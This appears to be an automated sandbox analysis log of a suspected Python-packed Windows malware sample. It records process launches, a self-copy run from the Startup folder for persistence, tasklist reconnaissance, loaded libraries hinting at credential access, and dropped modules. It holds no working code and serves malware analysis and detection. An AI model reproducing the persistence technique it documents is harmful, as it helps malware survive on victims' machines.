Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

File read: C:\Users\user\Desktop\HyZh4pn0RF.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\HyZh4pn0RF.exe "C:\Users\user\Desktop\HyZh4pn0RF.exe"
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Process created: C:\Users\user\Desktop\HyZh4pn0RF.exe "C:\Users\user\Desktop\HyZh4pn0RF.exe"
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Process created: C:\Users\user\Desktop\HyZh4pn0RF.exe "C:\Users\user\Desktop\HyZh4pn0RF.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist

Source: HyZh4pn0RF.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: HyZh4pn0RF.exe

Static file information: File size 13884221 > 1048576

Source: HyZh4pn0RF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HyZh4pn0RF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HyZh4pn0RF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HyZh4pn0RF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HyZh4pn0RF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HyZh4pn0RF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: HyZh4pn0RF.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: HyZh4pn0RF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1834045763.00007FFBAAFF4000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAB31000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: HyZh4pn0RF.exe, 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843680018.00007FFBBCD53000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAA99000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843680018.00007FFBBCD53000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAB31000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1842850909.00007FFBBC153000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1843366024.00007FFBBC261000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1839349243.00007FFBB4C47000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841899584.00007FFBBB37C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841121010.00007FFBBAE72000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1840833630.00007FFBB7FB8000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838082520.00007FFBAB6F2000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1842565303.00007FFBBBE93000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841899584.00007FFBBB37C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843136590.00007FFBBC244000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841637269.00007FFBBAF59000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843136590.00007FFBBC244000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838782626.00007FFBAB7ED000.00000002.00000001.01000000.0000000F.sdmp

Source: HyZh4pn0RF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HyZh4pn0RF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HyZh4pn0RF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HyZh4pn0RF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HyZh4pn0RF.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: VCRUNTIME140_1.dll.0.dr

Static PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]

Source: HyZh4pn0RF.exe	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libcrypto-3.dll.0.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.0.dr	Static PE information: section name: .00cfg
Source: python312.dll.0.dr	Static PE information: section name: PyRuntim
Source: HyZh4pn0RF.exe.2.dr	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.9.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.9.dr	Static PE information: section name: _RDATA
Source: libcrypto-3.dll.9.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.9.dr	Static PE information: section name: .00cfg
Source: python312.dll.9.dr	Static PE information: section name: PyRuntim

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4C5004 push rsp; retf	0_2_00007FF78F4C5005
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5C161E push rdx; iretd	2_2_00007FFBAA5C1621
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7C7020 push rbp; retf	2_2_00007FFBAB7C7023
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7C7038 push rsp; retf	2_2_00007FFBAB7C703B
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7C7030 push rbp; retf	2_2_00007FFBAB7C704B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769365004 push rsp; retf	9_2_00007FF769365005
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2F161E push rdx; iretd	10_2_00007FFBAA2F1621
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB844021 push rcx; ret	10_2_00007FFBBB844022

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
